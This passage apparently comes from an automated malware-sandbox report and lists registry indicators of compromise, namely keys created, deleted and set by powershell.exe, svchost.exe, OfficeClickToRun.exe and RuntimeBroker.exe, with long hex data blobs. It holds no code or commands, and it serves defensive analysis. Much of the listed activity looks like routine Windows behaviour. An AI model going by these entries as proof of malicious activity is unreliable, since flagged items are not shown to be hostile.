Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1729404130"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sun, 20 Oct 2024 06:02:11 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE

Modifies registry class 64 IoCs

Processes:

RuntimeBroker.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\128d02d0-f6d2-4e86- = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8beb6318-790e-4e61- = 0516eb9eb522db01	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6009ba12-b7ae-4754- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6009ba12-b7ae-4754- = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\64acd353-61ec-4853- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000153a5e9fb522db01bd0bf29fb522db01bd0bf29fb522db01d24105000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000054594a302000633534326262343837613764666236383536313131333730663333383264626237323330376464626430616439366535303735313237306132373564303731340000b20009000400efbe54594a3054594a302e00000000000000000000000000000000000000000000000000819bba00630035003400320062006200340038003700610037006400660062003600380035003600310031003100330037003000660033003300380032006400620062003700320033003000370064006400620064003000610064003900360065003500300037003500310032003700300061003200370035006400300037003100340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000210ca2c01000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63353432626234383761376466623638353631313133373066333338326462623732333037646462643061643936653530373531323730613237356430373134000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000075746b6265626c6f000000000000000050f199348f53f249b0bff96ed04847684bf1537e9384ef1191c34e8e92b5429850f199348f53f249b0bff96ed04847684bf1537e9384ef1191c34e8e92b54298ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003900340030003900300031003300360032002d0033003600300038003800330033003100380039002d0031003900310035003600310038003600300033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c4d65e62000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b73c9b00-f5b0-4472-	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6009ba12-b7ae-4754-	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\31b2dd35-35d1-455d-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\128d02d0-f6d2-4e86- = "8324"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\05eb9cac-3265-4f6f- = "8324"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\05eb9cac-3265-4f6f- = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\31b2dd35-35d1-455d-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b73c9b00-f5b0-4472- = "8324"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d21b2596-66cf-41e1- = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\753d2eb8-bccc-4055- = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\682dcb29-ad4b-4667- = a8e43ba0b522db01	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\128d02d0-f6d2-4e86- = "\\\\?\\Volume{625ED6C4-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\c612b11bce7c54fa4925c5d3d05b6864cf6327a1d3b5e05aca805e872f7cb4ed"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b73c9b00-f5b0-4472- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d21b2596-66cf-41e1- = c298b79fb522db01	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\753d2eb8-bccc-4055- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\753d2eb8-bccc-4055- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000001814389fb522db01da46ed9fb522db01da46ed9fb522db01da440c000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000054594a302000383631366238646639663434393234643838306339626665326537613736613130656262656161366632363466663239303436393533346234346535663538640000b20009000400efbe54594a3054594a302e000000000000000000000000000000000000000000000000008525c400380036003100360062003800640066003900660034003400390032003400640038003800300063003900620066006500320065003700610037003600610031003000650062006200650061006100360066003200360034006600660032003900300034003600390035003300340062003400340065003500660035003800640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000210ca2c01000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c38363136623864663966343439323464383830633962666532653761373661313065626265616136663236346666323930343639353334623434653566353864000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000075746b6265626c6f000000000000000050f199348f53f249b0bff96ed04847684af1537e9384ef1191c34e8e92b5429850f199348f53f249b0bff96ed04847684af1537e9384ef1191c34e8e92b54298ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003900340030003900300031003300360032002d0033003600300038003800330033003100380039002d0031003900310035003600310038003600300033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c4d65e62000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\44ed5eaa-898a-4b05- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000008dc3679fb522db012c9239a0b522db012c9239a0b522db012cc908000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000054594a302000633561396338336265323834386336616631633135613432346138656535323431346133306430653839623364376435383064306165313033363265643365380000b20009000400efbe54594a3054594a302e00000000000000000000000000000000000000000000000000d112b100630035006100390063003800330062006500320038003400380063003600610066003100630031003500610034003200340061003800650065003500320034003100340061003300300064003000650038003900620033006400370064003500380030006400300061006500310030003300360032006500640033006500380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000210ca2c01000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63356139633833626532383438633661663163313561343234613865653532343134613330643065383962336437643538306430616531303336326564336538000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000075746b6265626c6f000000000000000050f199348f53f249b0bff96ed04847684df1537e9384ef1191c34e8e92b5429850f199348f53f249b0bff96ed04847684df1537e9384ef1191c34e8e92b54298ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003900340030003900300031003300360032002d0033003600300038003800330033003100380039002d0031003900310035003600310038003600300033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c4d65e62000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\31b2dd35-35d1-455d- = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\31b2dd35-35d1-455d- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000fc7add9eb522db01fc7add9eb522db01fc7add9eb522db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000054594a302000346436376530663034613764373631623232383932393836653364353237376163636637363133366634313037613564333035303539623162643664363738360000b20009000400efbe54594a3054594a302e0000000000000000000000000000000000000000000000000004c3c100340064003600370065003000660030003400610037006400370036003100620032003200380039003200390038003600650033006400350032003700370061006300630066003700360031003300360066003400310030003700610035006400330030003500300035003900620031006200640036006400360037003800360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000210ca2c01000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34643637653066303461376437363162323238393239383665336435323737616363663736313336663431303761356433303530353962316264366436373836000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000075746b6265626c6f000000000000000050f199348f53f249b0bff96ed048476841f1537e9384ef1191c34e8e92b5429850f199348f53f249b0bff96ed048476841f1537e9384ef1191c34e8e92b54298ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003900340030003900300031003300360032002d0033003600300038003800330033003100380039002d0031003900310035003600310038003600300033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c4d65e62000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8beb6318-790e-4e61- = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b73c9b00-f5b0-4472- = "\\\\?\\Volume{625ED6C4-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\c5a9c83be2848c6af1c15a424a8ee52414a30d0e89b3d7d580d0ae10362ed3e8"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\59a630d9-56b2-454f-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\64acd353-61ec-4853- = "8324"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\44ed5eaa-898a-4b05- = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\128d02d0-f6d2-4e86- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000000906c89eb522db010906c89eb522db010906c89eb522db01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000054594a302000633631326231316263653763353466613439323563356433643035623638363463663633323761316433623565303561636138303565383732663763623465640000b20009000400efbe54594a3054594a302e00000000000000000000000000000000000000000000000000f737d700630036003100320062003100310062006300650037006300350034006600610034003900320035006300350064003300640030003500620036003800360034006300660036003300320037006100310064003300620035006500300035006100630061003800300035006500380037003200660037006300620034006500640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000210ca2c01000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63363132623131626365376335346661343932356335643364303562363836346366363332376131643362356530356163613830356538373266376362346564000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000075746b6265626c6f000000000000000050f199348f53f249b0bff96ed04847683ff1537e9384ef1191c34e8e92b5429850f199348f53f249b0bff96ed04847683ff1537e9384ef1191c34e8e92b54298ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d003900340030003900300031003300360032002d0033003600300038003800330033003100380039002d0031003900310035003600310038003600300033002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c4d65e62000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\05eb9cac-3265-4f6f-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\31b2dd35-35d1-455d-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6009ba12-b7ae-4754-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6009ba12-b7ae-4754- = "8324"	RuntimeBroker.exe
